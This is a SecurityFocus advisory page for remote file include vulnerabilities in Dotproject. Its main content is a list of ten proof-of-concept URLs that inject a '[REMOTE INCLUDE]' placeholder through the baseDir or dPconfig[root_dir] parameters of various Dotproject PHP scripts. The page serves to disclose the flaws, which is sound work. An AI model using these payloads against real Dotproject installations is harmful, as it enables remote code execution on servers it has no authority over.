Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Dotproject Multiple Remote File Include Vulnerabilities

An exploit is not required.

The following proof of concept exploits are available:

http://www.example.com/includes/db_adodb.php?baseDir=[REMOTE INCLUDE]

http://www.example.com/includes/db_connect.php?baseDir=[REMOTE INCLUDE]

http://www.example.com/includes/session.php?baseDir=[REMOTE INCLUDE]

http://www.example.com/modules/projects/gantt.php?dPconfig[root_dir]=[REMOTE INCLUDE]

http://www.example.com /modules/projects/gantt2.php?dPconfig[root_dir]=[REMOTE INCLUDE]

http://www.example.com /modules/projects/vw_files.php?dPconfig[root_dir]=[REMOTE INCLUDE]

http://www.example.com /modules/admin/vw_usr_roles.php?baseDir=[REMOTE INCLUDE]

http://www.example.com /modules/public/calendar.php?baseDir=[REMOTE INCLUDE]

http://www.example.com /modules/public/date_format.php?baseDir=[REMOTE INCLUDE]

http://www.example.com /modules/tasks/gantt.php?baseDir=[REMOTE INCLUDE]







 

Privacy Statement
Copyright 2009, SecurityFocus